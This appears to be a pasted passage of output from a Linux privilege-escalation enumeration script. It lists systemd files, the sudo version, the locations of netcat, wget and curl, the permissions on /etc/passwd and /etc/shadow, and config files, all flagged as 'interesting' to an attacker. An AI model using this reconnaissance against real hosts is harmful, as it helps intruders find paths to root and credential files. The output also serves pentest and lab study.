- -rwxr-xr-x 1 root root 59K Mar 8 2018 systemd-dbus1-generator
- -rwxr-xr-x 1 root root 43K Mar 8 2018 systemd-debug-generator
- -rwxr-xr-x 1 root root 79K Mar 8 2018 systemd-fstab-generator
- -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-getty-generator
- -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-hibernate-resume-generator
- -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-insserv-generator
- -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-rc-local-generator
- -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-system-update-generator
- -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-sysv-generator
- -rwxr-xr-x 1 root root 119K Mar 8 2018 systemd-gpt-auto-generator
- -rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator
- /lib/systemd/system-shutdown:
- total 4.0K
- -rwxr-xr-x 1 root root 160 Nov 8 2017 mdadm.shutdown
- /lib/systemd/system-sleep:
- total 4.0K
- -rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm
- /lib/systemd/network:
- total 12K
- -rw-r--r-- 1 root root 404 Mar 8 2018 80-container-host0.network
- -rw-r--r-- 1 root root 482 Mar 8 2018 80-container-ve.network
- -rw-r--r-- 1 root root 80 Mar 8 2018 99-default.link
- /lib/systemd/system-preset:
- total 4.0K
- -rw-r--r-- 1 root root 869 Mar 8 2018 90-systemd.preset
- ### SOFTWARE #############################################
- [-] Sudo version:
- Sudo version 1.8.16
- ### INTERESTING FILES ####################################
- [-] Useful file locations:
- /bin/nc
- /bin/netcat
- /usr/bin/wget
- /usr/bin/curl
- [-] Can we read/write sensitive files:
- -rw-r--r-- 1 root root 1684 Jul 1 2018 /etc/passwd
- -rw-r--r-- 1 root root 820 Jul 1 2018 /etc/group
- -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
- -rw-r----- 1 root shadow 1100 Jan 7 21:14 /etc/shadow
- [-] Can't search *.conf files as no keyword was entered
- [-] Can't search *.php files as no keyword was entered
- [-] Can't search *.log files as no keyword was entered
- [-] Can't search *.ini files as no keyword was entered
- [-] All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 3028 Jun 22 2018 /etc/adduser.conf
- -rw-r--r-- 1 root root 6488 Jun 22 2018 /etc/ca-certificates.conf
- -rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
- -rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
- -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
- -rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
- -rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
- -rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
- -rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
- -rw-r--r-- 1 root root 110 Jun 22 2018 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
- -rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf
- -rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
- -rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
- -rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 6920 Jan 11 2018 /etc/overlayroot.conf
- -rw-r--r-- 1 root root 112 Jun 22 2018 /etc/overlayroot.local.conf
- -rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
- -rw-r--r-- 1 root root 0 Jun 22 2018 /etc/popularity-contest.conf
- -rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf
- -rw-r--r-- 1 root root 100 Apr 11 2017 /etc/sos.conf
- -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
- -rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
- -rw-r--r-- 1 root root 2148 Jul 2 2018 /etc/sysctl.conf
- [-] Any interesting mail in /var/mail:
- total 0
- drwxrwsr-x 1 root mail 0 Jun 22 2018 .
- drwxr-xr-x 1 root root 108 Jun 22 2018 ..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement